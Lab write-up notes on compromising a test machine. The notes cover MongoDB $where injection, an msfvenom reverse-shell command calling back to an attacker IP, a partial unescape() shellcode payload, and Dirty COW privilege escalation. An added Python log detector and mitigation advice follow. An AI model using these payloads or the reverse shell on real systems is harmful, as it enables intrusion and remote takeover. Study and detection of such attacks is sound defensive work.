🎍 10.11.1.237 (Humble)

1. nmap shows that there are http and https; both show different webpages.
2. gobuster found a sus directory /web1 on the https webpage; seems like it contains a user and hashed password.
3. gobuster also found /test, which allows the user to search against the database, which might be vulnerable to SQL injection.
4. Giving it a ' character made it throw an error, so it should be vuln to SQL injection.
5. It also gives the mongodb version, 2.2.3. A google search reveals a potential reverse shell vulnerability: https://www.exploit-db.com/exploits/24947
6. The exploit states that it requires a javascript payload in shellcode; used msfvenom to generate the payload:
   msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.218 LPORT=1234 CMD=/bin/bash -f js_le -e generic/none
7. After 10000 years of modifying the payload, finally made it work (stuck on not removing the collection.find({'$where':' ):
   aaaa'; shellcode=unescape("%udb31%ue3f7%u4353%u6a53%u8902%ub0e1%ucd66%u9380%ub059%ucd3f%u4980%uf979%uc068%u77a8%u68da%u0002%ud204%ue189%u66
8. Obtained reverse shell, mongodb.
9. We realise that the kernel version is quite old; might be vuln to dirty cow (for debian distros, it was only fixed on 3.16.36 and this machine's version is 3.2.0, so it should be vulnerable).
10. Run dirtycow exploit and get root shell.
11. Get proof.
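Steps 3-4 (the quote probe against /test) and 6-7 (the string breakout that lands a JavaScript payload inside a MongoDB $where clause) leave a clear footprint in the web server's access log. The following detection script is an added example and is not part of the original notes or of the exploit-db entry: it parses constructed Apache/nginx-style log lines, URL-decodes the query of requests to the assumed /test endpoint, and flags the quote probe (a quote followed by a 5xx), the quote-plus-terminator breakout, the $where operator, and the unescape()/%uXXXX shellcode encoding that msfvenom's js_le format produces. The endpoint path, the log format and the sample lines are assumptions.

```python
"""Flag NoSQL ($where) injection attempts against a search endpoint.

Added example, not part of the original notes. The /test path, the
combined-log format and SAMPLE_LOG below are constructed assumptions.
"""
import re
from urllib.parse import urlsplit, unquote

SEARCH_PATH = "/test"  # assumed: the search endpoint gobuster found in the notes

# Indicators checked against the fully URL-decoded query string.
INDICATORS = {
    # a quote immediately followed by a statement terminator or closing paren
    # (breaking out of the string literal inside a server-side JS $where)
    "quote_breakout": re.compile(r"""['"]\s*[;)]"""),
    # the $where operator smuggled in directly
    "where_operator": re.compile(r"\$where", re.I),
    # JS unescape() or a run of %uXXXX escapes (what msfvenom -f js_le emits)
    "js_shellcode": re.compile(r"unescape\s*\(|(?:%u[0-9a-fA-F]{4}){4,}"),
}

# Apache/nginx combined log prefix: ip ident user [ts] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(target, status):
    """Return the indicator names triggered by one request target/status pair."""
    parts = urlsplit(target)
    if parts.path != SEARCH_PATH:
        return []
    # decode twice so a %25-encoded payload is still inspected in clear
    decoded = unquote(unquote(parts.query))
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    # a lone quote that produced a server error is the classic injection probe
    if status.startswith("5") and ("'" in decoded or '"' in decoded):
        hits.append("quote_error")
    return hits


def scan_log(lines):
    """Return a record for every log line that trips at least one indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m["target"], m["status"])
        if hits:
            findings.append({"ip": m["ip"], "ts": m["ts"],
                             "status": m["status"], "indicators": hits})
    return findings


# Constructed sample: a benign search, the quote probe, a js_le-style payload
# (only the first four %u words of the notes' shellcode), and an unrelated hit.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:10:00:01 +0000] "GET /test?q=alice HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:10:00:07 +0000] "GET /test?q=%27 HTTP/1.1" 500 233
203.0.113.5 - - [10/Oct/2023:10:00:42 +0000] "GET /test?q=aaaa%27%3B+shellcode%3Dunescape(%22%25udb31%25ue3f7%25u4353%25u6a53%22)%3B HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:10:01:03 +0000] "GET /web1/ HTTP/1.1" 200 1870
""".splitlines()


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} {','.join(f['indicators'])}")
```

The root cause on the MongoDB side is user input concatenated into a `$where` string, which the server evaluates as JavaScript. Besides detecting the attempts, a defender can remove the primitive entirely: MongoDB's `security.javascriptEnabled: false` setting (or `mongod --noscripting`) disables server-side JavaScript, and search endpoints should build structured filters rather than `$where` strings.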